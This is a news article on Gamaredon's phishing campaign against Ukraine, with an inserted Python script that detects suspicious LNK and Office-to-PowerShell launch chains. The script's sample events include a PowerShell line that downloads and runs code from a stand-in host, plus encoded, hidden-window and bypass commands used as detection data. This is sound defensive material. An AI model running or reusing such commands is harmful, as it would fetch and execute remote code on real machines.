Russian Gamaredon hackers are using info-stealing malware to target the Ukrainian government. According to Cisco Talos, a new phishing campaign using LNK files, PowerShell, and VBScript gives the Russian hackers initial access and makes use of Russian language specific to Ukraine. This new tactic gives them access to the computer, after which they try to gain further access using malicious binaries.
The Gamaredon group, also known as Actinium, Armageddon, Primitive Bear, Shuckworm, and Trident Ursa, is a cyber-criminal outfit that first appeared in late 2013. It is responsible for much of the chaos that ensued following Russia's invasion of Ukraine in February 2022.
Symantec reported that in its latest campaign, the hacking group installed malware called Giddome and Pterodo. The group targets financial institutions or media companies with the intention of gaining long-term access to data. The technique infects targets with remote templates: once a Word document is opened, its macros execute and retrieve files to infect the target.
The LNK file creates a PowerShell script that is triggered once the victim is tricked into opening it.
That script provides persistent access to the compromised system and delivers additional malware, including a new piece of malware capable of plundering files from the machine and any removable drive connected to it.
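The chain described above (a user opening an LNK that launches PowerShell, and a Word document whose macros hand off to a script host) leaves a recognisable parent/child footprint in process-creation telemetry. The following is an added detection example, not code from the article or from any of the researchers it cites; the log format, the sample events and the rule names are all constructed for illustration, and the process-launch flags it looks for are generic PowerShell options rather than anything the article attributes to this campaign.

```python
"""Toy detection over process-creation events for the two launch patterns in the
article: Explorer (i.e. a user double-click, such as on an LNK) starting a script
host with evasion-style flags, and an Office application starting a script host.
Event format and sample data are constructed (hypothetical), not real telemetry."""
import re
from dataclasses import dataclass

# Constructed sample events in a simple "parent|image|cmdline" form (hypothetical format).
SAMPLE_EVENTS = [
    "explorer.exe|powershell.exe|powershell.exe -w hidden -ep bypass -enc SQBFAFgA",
    "WINWORD.EXE|powershell.exe|powershell.exe -nop -c iex (New-Object Net.WebClient).DownloadString('http://example.invalid/x')",
    "winword.exe|wscript.exe|wscript.exe C:\\Users\\Public\\update.vbs",
    "explorer.exe|notepad.exe|notepad.exe report.txt",
    "svchost.exe|powershell.exe|powershell.exe -File C:\\Scripts\\inventory.ps1",
]

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe"}

# Generic PowerShell options that are rare in legitimate interactive use.
SUSPICIOUS_FLAGS = re.compile(
    r"(?i)(-enc\b|-encodedcommand|-ep\s+bypass|-executionpolicy\s+bypass|"
    r"-w\s+hidden|-windowstyle\s+hidden|downloadstring|\biex\b)"
)


@dataclass
class Finding:
    rule: str
    parent: str
    image: str
    cmdline: str


def parse_event(line):
    """Split one constructed event line into (parent, image, cmdline); names are lower-cased."""
    parent, image, cmdline = line.split("|", 2)
    return parent.strip().lower(), image.strip().lower(), cmdline.strip()


def evaluate(line):
    """Return the list of findings (possibly empty) for a single event."""
    parent, image, cmdline = parse_event(line)
    findings = []
    # Remote-template / macro chain: an Office process should not normally spawn a script host.
    if parent in OFFICE_PARENTS and image in SCRIPT_HOSTS:
        findings.append(Finding("office_spawns_script_host", parent, image, cmdline))
    # User-launched LNK chain: Explorer is the parent of anything a user double-clicks, so
    # the parent alone proves nothing; require evasion-style flags on the command line too.
    if parent == "explorer.exe" and image in SCRIPT_HOSTS and SUSPICIOUS_FLAGS.search(cmdline):
        findings.append(Finding("user_launched_script_host_with_evasion_flags", parent, image, cmdline))
    return findings


def scan(lines):
    """Evaluate every event and return all findings in input order."""
    return [f for line in lines for f in evaluate(line)]


if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS):
        print(f"[{finding.rule}] {finding.parent} -> {finding.image}: {finding.cmdline}")
```

The two rules deliberately differ in strictness: Office spawning a script host is unusual enough to flag on its own, whereas Explorer spawning PowerShell is everyday activity and only becomes interesting together with hidden-window, encoded-command or execution-policy-bypass options. Real telemetry (for example Sysmon event ID 1) carries the same three fields, so the rules port directly; the parsing is what would change.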
Researchers found that the Giddome backdoor family can deliver additional binary- and script-based payloads.
These findings come at an important moment amidst the conflict between Russia and Ukraine. Just last month, Google's Threat Analysis Group disclosed as many as five different campaigns by a group with links to the Conti cyber-crime cartel.